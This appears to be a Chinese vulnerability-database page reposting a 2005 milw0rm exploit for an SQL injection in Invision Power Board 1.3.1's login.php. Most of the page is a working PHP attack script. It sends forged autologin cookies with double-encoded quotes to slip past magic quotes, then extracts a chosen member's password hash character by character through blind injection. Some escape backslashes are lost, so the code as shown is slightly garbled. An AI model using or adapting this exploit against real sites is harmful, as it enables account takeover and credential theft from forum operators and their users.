Invision Power Board 1.3.1 – ‘login.php’ SQL Injection
漏洞ID | 1055158 | 漏洞类型 | |
发布时间 | 2005-06-08 | 更新时间 | 2005-06-08 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | PHP | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
<?php
/*
<= 1.3.1 Final
/str0ke
*/
$server = "SERVER";
$port = 80;
$file = "PATH";
$target = 81;
/* User id and password used to fake-logon are not important. '10' is a
random number. */
$id = 10;
$pass = "";
$hex = "0123456789abcdef";
for($i = 1; $i <= 32; $i++ ) {
$idx = 0;
$found = false;
while( !($found) ) {
$letter = substr($hex, $idx, 1);
/* %2527 translates to %27, which gets past magic quotes.
This is translated to ' by urldecode. */
$cookie =
"member_id=$id;pass_hash=$pass%2527%20OR%20id=$target";
$cookie .=
"%20HAVING%20id=$target%20AND%20MID(`password`,$i,1)=%2527" . $letter;
/* Query is in effect: SELECT * FROM ibf_members
WHERE id=$id AND password='$pass' OR
id=$target
HAVING id=$target AND
MID(`password`,$i,1)='$letter' */
$header = getHeader($server, $port, $file .
"index.php?act=Login&CODE=autologin", $cookie);
if( !preg_match('/Location:(.*)act=Login&CODE=00rn/',
$header) ) {
echo $i . ": " . $letter . "n";
$found = true;
$hash .= $letter;
} else {
$idx++;
}
}
}
echo "nnFinal Hash: $hashn";
function getHeader($server, $port, $file, $cookie) {
$ip = gethostbyname($server);
$fp = fsockopen($ip, $port);
if (!$fp) {
return "Unknown";
} else {
$com = "HEAD $file HTTP/1.1rn";
$com .= "Host: $server:$portrn";
$com .= "Cookie: $cookiern";
$com .= "Connection: closern";
$com .= "rn";
fputs($fp, $com);
do {
$header.= fread($fp, 512);
} while( !preg_match('/rnrn$/',$header) );
}
return $header;
}
?>
// milw0rm.com [2005-06-08]
相关推荐: PHPBB Authentication Bypass Vulnerability
PHPBB Authentication Bypass Vulnerability 漏洞ID 1076425 漏洞类型 Input Validation Error 发布时间 2005-02-28 更新时间 2005-02-28 CVE编号 N/A CNNVD…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666